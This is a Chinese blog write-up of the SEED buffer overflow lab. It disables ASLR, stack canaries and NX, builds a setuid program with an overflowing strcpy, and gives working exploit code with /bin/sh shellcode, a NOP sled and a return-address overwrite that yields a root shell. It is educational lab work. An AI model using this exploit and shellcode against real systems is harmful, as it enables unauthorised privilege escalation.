记一次对“缓冲区溢出漏洞”的攻击实验

爱被打了一巴掌 2024-04-17 05:52 71阅读 0赞

> 实验地址：[SEED 缓冲区溢出漏洞实验室][SEED]

## 零、前言 ##

之前学习了X86-64汇编，结合C语言代码了解了函数调用的底层原理，像栈帧什么的。这次通过自己动手做一个栈溢出漏洞攻击的实验，更加深刻的理解函数栈帧的底层布局。

## 一、实验准备 ##

> 测试机器使用的Linux版本为：Ubuntu-64。

### 1. 配置32位Linux环境 ###

sudo apt-get update
    sudo apt-get install -y lib32z1 libc6-dev-i386
    sudo apt-get install -y lib32readline-gplv2-dev

### 2. 关闭地址空间布局随机化（ASLR） ###

sudo sysctl -w kernel.randomize_va_space=0

### 3. 重定向bash ###

sudo su
    cd /bin
    rm sh
    ln -s zsh sh
    exit
    # 使用bash
    /bin/bash

### 4. 进入32位Linux环境 ###

linux32

## 二、开始实验 ##

### 1. 设计shellcode ###

设计一段shellcode：

#include <stdio.h>
    
    int main() { 
        char* name[2];
        name[0] = "/bin/sh";
        name[1] = NULL;
        execve(name[0], name, NULL);
    }

这段shellcode的汇编版本：

\x31\xc0\x50\x68"//sh"\x68"/bin"\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80

### 2. 设计一段有“缓冲区溢出”漏洞的代码 ###

/* stack.c */
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    int bof(char* str) { 
        char buffer[12];
        /* 下面这行代码有“缓冲区溢出”漏洞 */ 
        strcpy(buffer, str);
        return 1;
    }
    
    int main(int argc, char **argv) { 
        char str[517];
        FILE* badfile;
    
        badfile = fopen("badfile", "r");
        
        fread(str, sizeof(char), 517, badfile);
        bof(str);
    
        printf("Returned Properly\n");
        return 0;
    }

### 3. 编译目标程序 ###

sudo su
    gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
    chmod u+s stack
    exit

> gcc编译指令解释：
> 
> gcc编译器有一种栈保护机制\[1\]来阻止缓冲区溢出，所以我们在编译代码时需要用 `–fno-stack-protector` 关闭这种机制。 gcc编译器默认也会开启NX选项\[2\]，而 `-z execstack` 用于显式关闭NX选项。
> 
> 关于`s`权限：
> 
> 当一个具有执行权限的文件设置SetUID权限后，用户执行这个文件时将以文件所有者的身份执行。

### 4. 设计攻击程序代码 ###

/* exploit.c */
    
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    /*前面设计的shellcode的汇编代码*/
    char shellcode[] =
        "\x31\xc0" 		//xorl %eax,%eax
        "\x50"     		//pushl %eax
        "\x68""//sh"    //pushl $0x68732f2f
        "\x68""/bin"    //pushl $0x6e69622f
        "\x89\xe3" 		//movl %esp,%ebx
        "\x50"     		//pushl %eax
        "\x53"     		//pushl %ebx
        "\x89\xe1" 		//movl %esp,%ecx
        "\x99"     		//cdq
        "\xb0\x0b" 		//movb $0x0b,%al
        "\xcd\x80" 		//int $0x80
        ;
    
    void main(int argc, char *argv[]) { 
        char buffer[517];
        FILE* badfile;
    
        /* 用 0x90 (NOP指令) 初始化buffer*/
        memset(&buffer, 0x90, 517);
    
        /*在buffer特定偏移处起始的四个字节覆盖sellcode地址*/
        strcpy(buffer,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ \x??\x??\x??\x??");
        /*将shellcode拷贝至buffer，偏移量设为100*/
        strcpy(buffer + 100, shellcode);   
    
        badfile = fopen("./badfile", "w");
        fwrite(buffer, 517, 1, badfile);
        fclose(badfile);
    }

> 注意：
> 
> `\x??\x??\x??\x??`处需要填上`shellcode` 保存在内存中的地址，因为发生溢出后这个位置刚好可以覆盖函数的返回地址。

### 5. 获取shellcode在内存中的地址 ###

> str在内存中的地址并不是固定的，所以这里需要用gdb调试stack程序具体的查看str在内存中的地址。博主本次实验所获取的地址并不一定和其他人实验时获取的地址相同。

使用gdb调试`stack`程序：

# 进入gdb调试
    gdb stack
    # 反汇编main函数
    diass main

结果如下：

![gdb调试截图][gdb]

继续调试：

b *0x080484e8
    r
    i r $esp

![gdb调试截图][gdb 1]

获取到`str`的地址后退出调试。

由于攻击程序代码中把`shellcode`放在`buffer+100`处，那么`shellcode`在内存中的地址为：

`0xffffd450(str的首地址) + 0x64(100的16进制) = 0xffffd4b4`

### 6. 完善攻击程序代码 ###

将`exploit.c`中`\x??\x??\x??\x??`修改为计算出的地址：`\xb4\xd4\xff\xff`。

### 7. 编译攻击程序 ###

gcc -m32 -o exploit exploit.c

### 8. 进行攻击，观察攻击结果 ###

# 运行攻击程序
    ./exploit
    # 运行目标程序
    ./stack
    # 查看当前用户，看是否获取root权限
    whoami

如果攻击成功，那么`whoami`显示的结果就是`root`，否则就会提示`Segmentation fault`。这里攻击失败的原因往往是刚才的内存地址计算错误，重新计算一遍再进行尝试。

## 三、写在最后 ##

TODO：对抗缓冲区溢出攻击的措施

## 四、附录 ##

\[1\]：栈溢出保护是一种缓冲区溢出攻击缓解手段，当函数存在缓冲区溢出攻击漏洞时，攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后，函数开始执行的时候会先往栈里插入金丝雀值，当函数真正返回的时候会验证金丝雀值是否合法，如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将栈上的金丝雀值给覆盖掉，导致栈保护检查失败而阻止shellcode的执行。

\[2\]：NX的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入shellcode时，程序尝试在数据页面上执行指令，此时CPU就会抛出异常，而不是去执行恶意指令。

[SEED]: https://seedsecuritylabs.org/Labs_16.04/Software/Buffer_Overflow/
[gdb]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/11/64af892e63ee425c8f8a00dedc33af2e.png
[gdb 1]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/11/dee888eec6d54f07b4ad8259b6033f48.jpg